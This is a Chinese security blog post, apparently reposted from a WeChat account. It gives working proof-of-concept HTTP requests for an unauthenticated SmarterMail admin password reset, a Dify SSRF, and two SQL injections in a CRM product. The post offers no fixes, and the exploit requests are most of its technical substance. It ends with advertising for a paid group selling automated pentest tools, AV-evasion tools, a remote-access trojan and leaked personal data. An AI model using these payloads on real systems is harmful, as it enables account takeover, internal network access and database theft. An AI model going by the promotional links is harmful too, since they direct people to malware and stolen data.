文章总结： 本文档披露了SmarterMail管理员密码重置漏洞CVE-2026-23760、Difyv1.6.0SSRF漏洞CVE-2025-56520以及孚星云CRM两处SQL注入漏洞，并提供了详细的POC代码。此外，文章还包含AiScan-N自动化渗透测试工具及付费知识星球服务的推广内容。 综合评分： 50 文章分类： 漏洞POC,漏洞分析,软文广告

【0day】安全漏洞通告：SmarterMail 管理员密码重置 (CVE-2026-23760) 与 Dify SSRF (CVE-2025-56520)|孚*云SQL注入漏洞

原创

渗透测试 渗透测试

渗透测试

2026年1月25日 14:10 新加坡

点击上方蓝字关注【渗透测试】不迷路

免责声明：本文所涉及的技术、工具及方法仅限用于合法授权的学习、研究目的。使用者应知悉并同意，任何滥用行为所引发的一切后果均由其自行承担，本公众号概不负责。

SmarterTools SmarterMail 邮件服务器管理员密码重置漏洞（CVE-2026-23760）

说明：漏洞存在于 SmartMail 的 /api/v1/auth/force-reset-password 端点。攻击者可通过发送未授权的 POST 请求来触发管理员密码重置，从而暴露了系统的身份验证机制缺陷。

POC：

POST /api/v1/auth/force-reset-password HTTP/1.1Host: {{Hostname}}Content-Type: application/json
{"IsSysAdmin":"true","OldPassword":"watever","Username":"admin","NewPassword":"{password}","ConfirmPassword": "{password}"}

Dify v1.6.0 – 服务器端请求伪造（CVE-2025-56520）

说明：Dify v1.6.0 的 controllers.console.remote_files 组件存在一处服务器端请求伪造漏洞。该漏洞源于对用户输入验证不当，攻击者可利用 RemoteFileUploadApi 接口，以服务器权限发起任意网络请求。

POC:

GET /console/api/remote-files/http%3A%2F%2F{url}%2Ftest HTTP/1.1Host: {Hostname}

孚*云CRM AjaxProductTemplateList.ashx SQL注入漏洞

攻击者通过该漏洞可以获取数据库敏感信息。

POC

GET /m/Dingding/Ajax/AjaxProductTemplateList.ashx?method=SendMail&templateId=-1'and+1=@@VERSION-- HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: keep-alivePriority: u=0, iUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

孚*云 AjaxProductFiled.ashx SQL注入漏洞

孚*云 AjaxProductFiled.ashx SQL注入漏洞

POC:

GET /m/Dingding/Ajax/AjaxProductFiled.ashx?method=savePuductFiled&MouldID=-1%27waitfor+delay%270:0:3%27-- HTTP/1.1Host: Accept-Encoding: gzipConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36

✅AiScan-N使用反馈

🎁获取方式(加入付费星球)

客服支持 💬：24小时在线解答，不怕有问题！

💎终身使用权：购买即可获得星球所有工具的永久使用权，终身使用所有工具及未来升级版本。

🖥️ 多设备支持：所有工具采用一机一码授权，支持多台自用电脑激活，灵活无忧。

🏆一次购买，终身受益！享受无忧售后服务、技术支持与永久更新

星球介绍

自研工具、二开工具、免杀工具、漏洞复现、教程等资源、漏洞挖掘分析、网络安全相关资料分享。

近期0day+POC|Windows RCE 0day漏洞利用|最后一个宣称通杀Android12–16

免杀C2工具】PC端跨平台远程管理 ShadowRAT分析 | 汉化版附下载

【Ai渗透神器】AiScan‑N Ai自动渗透测试 | 助力CTF网络安全大赛，开启智能防护新篇章

本地离线大模型DeepSeek‑R‑14B&Qwen3+ AiScan‑N助力CTF网络安全大赛|内网快速扫描，无需访问互联网！

用Ai做自动化渗透测试对CTF题目进行解密|CTF网络安全大赛

【神兵利器】Ai全自动化渗透测试工具 | AiScan-N带你开启智能安全的新时代！

社工裤子 | 美国佬天塌了~

AiScan-N 不止于此！一款基于人工智能驱动的Ai自动化网络安全（运维）工具【CLI Agent】

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：渗透测试 渗透测试 渗透测试《【0day】安全漏洞通告：SmarterMail 管理员密码重置 (CVE-2026-23760) 与 Dify SSRF (CVE-2025-56520)|孚*云SQL注入漏洞》